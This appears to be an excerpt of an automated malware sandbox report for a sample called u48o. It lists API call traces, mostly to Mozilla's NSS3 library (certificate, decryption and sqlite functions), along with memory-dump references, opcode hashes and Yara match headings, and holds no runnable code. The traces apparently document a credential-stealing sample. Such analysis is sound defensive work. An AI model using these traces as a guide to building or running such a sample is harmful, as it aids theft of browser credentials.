                                                                                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6C334DDA
                                                                                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6C334E02
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4032354334-0
                                                                                                                                                                                                                                              • Opcode ID: 3dc9e018a8cc304fb154f5fc9ad7b1514fb3536ecf5e32a178134a31d5048848
                                                                                                                                                                                                                                              • Instruction ID: 15c0f6753f026beb30c04f5714f4d2ad2bf55b3093373a256e261cdc9d3748b7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3dc9e018a8cc304fb154f5fc9ad7b1514fb3536ecf5e32a178134a31d5048848
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1641B7B6A00255ABEB01AF25EC40A667BB8FF0521DF054170EC4C97B16EB36D954CFE2
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6C37536F,00000022,?,?,00000000,?), ref: 6C374E70
                                                                                                                                                                                                                                              • PORT_ZAlloc_Util.NSS3(00000000), ref: 6C374F28
                                                                                                                                                                                                                                              • PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6C374F8E
                                                                                                                                                                                                                                              • PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6C374FAE
                                                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6C374FC8
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: R_smprintf$Alloc_Utilfreeisspace
                                                                                                                                                                                                                                              • String ID: %s=%c%s%c$%s=%s$oS7l"
                                                                                                                                                                                                                                              • API String ID: 2709355791-17965633
                                                                                                                                                                                                                                              • Opcode ID: 0fbd666ca2249f812c0a4ff9d980ef76a749b6335d329631ef4f1b4085f8b7e0
                                                                                                                                                                                                                                              • Instruction ID: 48725fc56acb3035f2ea88ad7a11bedce38fa9aae5d49c980265800fd2ec6469
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0fbd666ca2249f812c0a4ff9d980ef76a749b6335d329631ef4f1b4085f8b7e0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0C513C71A051458BEB21CA6D94907FFBBF59F46318F188125E894A7E40D33EA805CFB9
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • PR_LogPrint.NSS3(C_MessageDecryptFinal), ref: 6C34ACE6
                                                                                                                                                                                                                                              • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C34AD14
                                                                                                                                                                                                                                              • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C34AD23
                                                                                                                                                                                                                                                • Part of subcall function 6C42D930: PL_strncpyz.NSS3(?,?,?), ref: 6C42D963
                                                                                                                                                                                                                                              • PR_LogPrint.NSS3(?,00000000), ref: 6C34AD39
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: L_strncpyzPrint$L_strcatn
                                                                                                                                                                                                                                              • String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageDecryptFinal$nBl
                                                                                                                                                                                                                                              • API String ID: 332880674-2828054072
                                                                                                                                                                                                                                              • Opcode ID: efcd0d883a6dc38c54ae15e20660d09a0a2d458d595a50743cc42a127ac55dd6
                                                                                                                                                                                                                                              • Instruction ID: ab2cac60d2c7ded205f0d6daf2ed735ca73664d696cd9eaa1a621d13e7147f18
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: efcd0d883a6dc38c54ae15e20660d09a0a2d458d595a50743cc42a127ac55dd6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2421D031601164DFDB11FB649D99FAA33F5EB4731EF048039E80997A12DF259808CEB2
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,00000100,?), ref: 6C35CD08
                                                                                                                                                                                                                                              • PK11_DoesMechanism.NSS3(?,?), ref: 6C35CE16
                                                                                                                                                                                                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6C35D079
                                                                                                                                                                                                                                                • Part of subcall function 6C3BC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C3BC2BF
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: DoesErrorK11_MechanismValuememcpy
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1351604052-0
                                                                                                                                                                                                                                              • Opcode ID: 523a323492a24b41ff2ed5f3d684c3dbcd69cb2fbe0d46a1cb3e335bafd3de18
                                                                                                                                                                                                                                              • Instruction ID: b889f31c91efe446d1bfeb24e34aef7bc7c1532f15a96d8b5ac5d7592becca97
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 523a323492a24b41ff2ed5f3d684c3dbcd69cb2fbe0d46a1cb3e335bafd3de18
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5AC18EB1A002199BDB10DF24DC80FDAB7B4BF48318F5441A8E948A7741E776EEA5CF91
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • PORT_ZAlloc_Util.NSS3(079DEF86), ref: 6C312C5D
                                                                                                                                                                                                                                                • Part of subcall function 6C370D30: calloc.MOZGLUE ref: 6C370D50
                                                                                                                                                                                                                                                • Part of subcall function 6C370D30: TlsGetValue.KERNEL32 ref: 6C370D6D
                                                                                                                                                                                                                                              • CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6C312C8D
                                                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C312CE0
                                                                                                                                                                                                                                                • Part of subcall function 6C312E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C312CDA,?,00000000), ref: 6C312E1E
                                                                                                                                                                                                                                                • Part of subcall function 6C312E00: SECITEM_DupItem_Util.NSS3(?), ref: 6C312E33
                                                                                                                                                                                                                                                • Part of subcall function 6C312E00: TlsGetValue.KERNEL32 ref: 6C312E4E
                                                                                                                                                                                                                                                • Part of subcall function 6C312E00: EnterCriticalSection.KERNEL32(?), ref: 6C312E5E
                                                                                                                                                                                                                                                • Part of subcall function 6C312E00: PL_HashTableLookup.NSS3(?), ref: 6C312E71
                                                                                                                                                                                                                                                • Part of subcall function 6C312E00: PL_HashTableRemove.NSS3(?), ref: 6C312E84
                                                                                                                                                                                                                                                • Part of subcall function 6C312E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6C312E96
                                                                                                                                                                                                                                                • Part of subcall function 6C312E00: PR_Unlock.NSS3 ref: 6C312EA9
                                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C312D23
                                                                                                                                                                                                                                              • CERT_IsCACert.NSS3(00000001,00000000), ref: 6C312D30
                                                                                                                                                                                                                                              • CERT_MakeCANickname.NSS3(00000001), ref: 6C312D3F
                                                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6C312D73
                                                                                                                                                                                                                                              • CERT_DestroyCertificate.NSS3(?), ref: 6C312DB8
                                                                                                                                                                                                                                              • free.MOZGLUE ref: 6C312DC8
                                                                                                                                                                                                                                                • Part of subcall function 6C313E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C313EC2
                                                                                                                                                                                                                                                • Part of subcall function 6C313E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C313ED6
                                                                                                                                                                                                                                                • Part of subcall function 6C313E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C313EEE
                                                                                                                                                                                                                                                • Part of subcall function 6C313E60: PR_CallOnce.NSS3(6C472AA4,6C3712D0), ref: 6C313F02
                                                                                                                                                                                                                                                • Part of subcall function 6C313E60: PL_FreeArenaPool.NSS3 ref: 6C313F14
                                                                                                                                                                                                                                                • Part of subcall function 6C313E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C313F27
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3941837925-0
                                                                                                                                                                                                                                              • Opcode ID: 12d9be628d2963cc3a5b8101e2cc1718538548f3c6e20d8d5b964042f6594400
                                                                                                                                                                                                                                              • Instruction ID: dcc440e915e5460d757272baddaedbd8b8676714364e6012dbab047bef3f12d2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 12d9be628d2963cc3a5b8101e2cc1718538548f3c6e20d8d5b964042f6594400
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4351EF71A183119FEB18DE69DD88B6B77E5EF85308F14042CECA583A50E733E8158F92
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • TlsGetValue.KERNEL32(?,00000001,00000000,?,?,6C333F23,?), ref: 6C32E432
                                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,00000001,00000000,?,?,6C333F23,?), ref: 6C32E44F
                                                                                                                                                                                                                                                • Part of subcall function 6C332C40: TlsGetValue.KERNEL32(#?3l,?,6C32E477,?,?,?,00000001,00000000,?,?,6C333F23,?), ref: 6C332C62
                                                                                                                                                                                                                                                • Part of subcall function 6C332C40: EnterCriticalSection.KERNEL32(0000001C,?,6C32E477,?,?,?,00000001,00000000,?,?,6C333F23,?), ref: 6C332C76
                                                                                                                                                                                                                                                • Part of subcall function 6C332C40: PL_HashTableLookup.NSS3(00000000,?,?,6C32E477,?,?,?,00000001,00000000,?,?,6C333F23,?), ref: 6C332C86
                                                                                                                                                                                                                                                • Part of subcall function 6C332C40: PR_Unlock.NSS3(00000000,?,?,?,?,6C32E477,?,?,?,00000001,00000000,?,?,6C333F23,?), ref: 6C332C93
                                                                                                                                                                                                                                              • TlsGetValue.KERNEL32(?,00000001,00000000,?,?,6C333F23,?), ref: 6C32E494
                                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,00000001,00000000,?,?,6C333F23,?), ref: 6C32E4AD
                                                                                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,00000001,00000000,?,?,6C333F23,?), ref: 6C32E4D6
                                                                                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,00000001,00000000,?,?,6C333F23,?), ref: 6C32E52F
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CriticalEnterSectionUnlockValue$HashLookupTable
                                                                                                                                                                                                                                              • String ID: #?3l
                                                                                                                                                                                                                                              • API String ID: 3106257965-211498274
                                                                                                                                                                                                                                              • Opcode ID: b8965151bc1f49d67d6d8f56041716043027d2d4ddfd9529c21e262e396cf694
                                                                                                                                                                                                                                              • Instruction ID: d8f998f0efab63f80d8a6ae9d7c42e5873bfc57a9cb84f245d9985abce184dfa
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b8965151bc1f49d67d6d8f56041716043027d2d4ddfd9529c21e262e396cf694
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3A4114B5A047158FCF00EF78D58556ABBF0FF09309B054969D8849BB15EB38E884CFA2
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • TlsGetValue.KERNEL32(00000000,00000000,?,6C33124D,00000001), ref: 6C328D19
                                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,6C33124D,00000001), ref: 6C328D32
                                                                                                                                                                                                                                              • PL_ArenaRelease.NSS3(?,?,?,?,?,6C33124D,00000001), ref: 6C328D73
                                                                                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,6C33124D,00000001), ref: 6C328D8C
                                                                                                                                                                                                                                                • Part of subcall function 6C3BDD70: TlsGetValue.KERNEL32 ref: 6C3BDD8C
                                                                                                                                                                                                                                                • Part of subcall function 6C3BDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C3BDDB4
                                                                                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,6C33124D,00000001), ref: 6C328DBA
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
                                                                                                                                                                                                                                              • String ID: KRAM$KRAM
                                                                                                                                                                                                                                              • API String ID: 2419422920-169145855
                                                                                                                                                                                                                                              • Opcode ID: 8c09fe9fef35623d60a6bd60c95de8d39c0e598e508d8cb17032c842d51e1f62
                                                                                                                                                                                                                                              • Instruction ID: 5b92c2a55656f9af7f4d518d5e3f305711b21fb26f63c9437198c2a6d96927ac
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8c09fe9fef35623d60a6bd60c95de8d39c0e598e508d8cb17032c842d51e1f62
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EA219FB2A046018FCF00EF38C4846AABBF4FF55308F15896AD88887705D739E846CF92
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __getptd.LIBCMT ref: 0041884F
                                                                                                                                                                                                                                                • Part of subcall function 00417B2C: __getptd_noexit.LIBCMT ref: 00417B2F
                                                                                                                                                                                                                                                • Part of subcall function 00417B2C: __amsg_exit.LIBCMT ref: 00417B3C
                                                                                                                                                                                                                                              • __amsg_exit.LIBCMT ref: 0041886F
                                                                                                                                                                                                                                              • __lock.LIBCMT ref: 0041887F
                                                                                                                                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 0041889C
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 004188AF
                                                                                                                                                                                                                                              • InterlockedIncrement.KERNEL32(00423530), ref: 004188C7
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                                                                                                                                                              • String ID: 05B
                                                                                                                                                                                                                                              • API String ID: 3470314060-3788103304
                                                                                                                                                                                                                                              • Opcode ID: cb1538446801220004b0e94d2aebbf41e1672ae537431284a663a37179733970
                                                                                                                                                                                                                                              • Instruction ID: f16d68fd9582ac4125616c5e50f94de62243aa4c7be40d45a23fde697d24a6fa
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cb1538446801220004b0e94d2aebbf41e1672ae537431284a663a37179733970
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4501AD32A05621ABD720BF6A98057CA7770AF04725F90402FF810A3390CB7CA9C2CBDD
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C3E4DC3
                                                                                                                                                                                                                                              • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C3E4DE0
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C3E4DCB
                                                                                                                                                                                                                                              • misuse, xrefs: 6C3E4DD5
                                                                                                                                                                                                                                              • API call with %s database connection pointer, xrefs: 6C3E4DBD
                                                                                                                                                                                                                                              • invalid, xrefs: 6C3E4DB8
                                                                                                                                                                                                                                              • %s at line %d of [%.10s], xrefs: 6C3E4DDA
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: sqlite3_log
                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                                                                                                                                                                                                              • API String ID: 632333372-2974027950
                                                                                                                                                                                                                                              • Opcode ID: e3385e3eff7b52e80e3284fae521f2e4a5d23508efaa730593d9800bdd63df49
                                                                                                                                                                                                                                              • Instruction ID: 32b353bd9f904c83fbb1a09fd63b7ff09aecd4edd653aa09c865055fa33b0f41
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e3385e3eff7b52e80e3284fae521f2e4a5d23508efaa730593d9800bdd63df49
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5CF0B421F146B87BE741D19ACC10F8737959F0E31DF564AA2EE046BA53D20698609791
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExitProcess$DefaultLangUser
                                                                                                                                                                                                                                              • String ID: *
                                                                                                                                                                                                                                              • API String ID: 1494266314-163128923
                                                                                                                                                                                                                                              • Opcode ID: b54c11c67429caad35af0389be56d96782f86342cf804ea28b4a9cbeb8073ebc
                                                                                                                                                                                                                                              • Instruction ID: 75b540bad49881e9417c8f8c63d74940121d586cf5f959f7794e893d96f52075
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b54c11c67429caad35af0389be56d96782f86342cf804ea28b4a9cbeb8073ebc
